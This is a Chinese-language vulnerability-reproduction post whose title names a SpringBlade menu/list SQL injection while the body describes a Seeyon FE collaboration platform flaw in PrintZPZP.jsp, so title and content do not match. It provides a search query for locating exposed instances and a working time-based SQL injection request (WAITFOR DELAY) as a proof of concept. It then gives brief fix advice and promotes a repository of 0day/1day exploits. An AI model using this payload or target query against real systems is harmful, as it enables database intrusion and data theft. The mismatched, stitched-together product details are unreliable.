【漏洞复现】SpringBlade menu/list SQL注入漏洞

》》》产品描述《《《

        致远互联智能协同是一个信息窗口与工作界面,进行所有信息的分类组合和聚合推送呈现。通过面向角色化、业务化、多终端的多维信息空间设计,为不同组织提供协同门户,打破组织内信息壁垒,构建统一协同沟通的平台。

》》》漏洞描述《《《

        致远互联 FE协作办公平台 PrintZPzP,jsp 存在一个 SQL 注入Q漏洞，通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权，从而查看、修改甚至删除数据库中的数据，严重威胁系统的安全性，

》》》搜索语句《《《

title="FE协作办公平台" || body="li_plugins_download"

》》》漏洞复现《《《

POC

GET /kp/PrintZPZP.jsp?zpshqid=1';WAITFOR+DELAY+'0:0:5'--  HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

》》》修复建议《《《

1、如非必要，禁止公网访问该系统。
2、用防火墙等安全设备设定访问规则，只允许白名单中的设备访问。
3、及时升级产品到最新版本。

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------